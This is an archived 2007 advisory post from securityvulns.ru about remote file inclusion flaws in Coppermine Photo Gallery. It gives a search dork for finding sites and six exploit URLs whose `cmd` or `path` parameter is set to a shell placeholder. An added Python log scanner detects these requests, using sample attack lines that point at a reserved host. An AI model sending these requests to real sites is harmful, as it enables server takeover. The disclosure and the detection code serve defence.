Computer Security
[EN] securityvulns.ru




From: RaeD Hasadya <raed_(at)_bsdmail.com>
Date: 09.03.2007
Subject: Remote File Include In Script Coppermine Photo Gallery

By Hasadya Raed
Contact : RaeD@BsdMail.Com
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

----------------------------------------

By Hasadya Raed
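
A defensive check for the request patterns listed in this advisory, as an added example that is not part of the original post or of Coppermine: it scans web-server access-log lines for requests to the listed scripts whose `cmd` or `path` parameter carries a remote-looking value. The Common/Combined Log Format, the names `scan`, `fully_decode` and `ADVISORY_TARGETS`, the "remote-looking" rule and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameter pairs exactly as listed in the advisory above.
ADVISORY_TARGETS = {
    "image_processor.php": "cmd",
    "include/functions.php": "path",
    "include/picmgmt.inc.php": "cmd",
    "include/plugin_api.inc.php": "path",
    "index.php": "path",
    "pluginmgr.php": "path",
}
# Assumption: a value starting with "scheme://" or "//" is treated as remote.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Client address and request target from a Common/Combined Log Format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)')

def fully_decode(value, rounds=3):
    # Undo repeated percent-encoding so %252F-style values are still recognised.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    # Returns one (client, script, parameter) tuple per request worth reviewing.
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        for script, param in ADVISORY_TARGETS.items():
            if not url.path.lower().endswith("/" + script):
                continue
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name == param and REMOTE_VALUE.match(fully_decode(value)):
                    hits.append((client, script, param))
    return hits

# Constructed sample log lines (documentation addresses, reserved .invalid domain).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2007:10:00:00 +0000] "GET /gallery/index.php?cat=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Mar/2007:10:00:05 +0000] "GET /gallery/include/functions.php?path=http://example.invalid/s.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [09/Mar/2007:10:00:09 +0000] "GET /gallery/image_processor.php?cmd=ftp%253A%252F%252Fexample.invalid%252Fs HTTP/1.1" 200 0',
    '192.0.2.10 - - [09/Mar/2007:10:01:00 +0000] "GET /gallery/index.php?path=albums/userpics HTTP/1.1" 200 880',
]
```

Calling `scan(SAMPLE_LOG)` flags the second and third lines only; the double-encoded `cmd` value is caught because the parameter is decoded repeatedly before matching.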

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod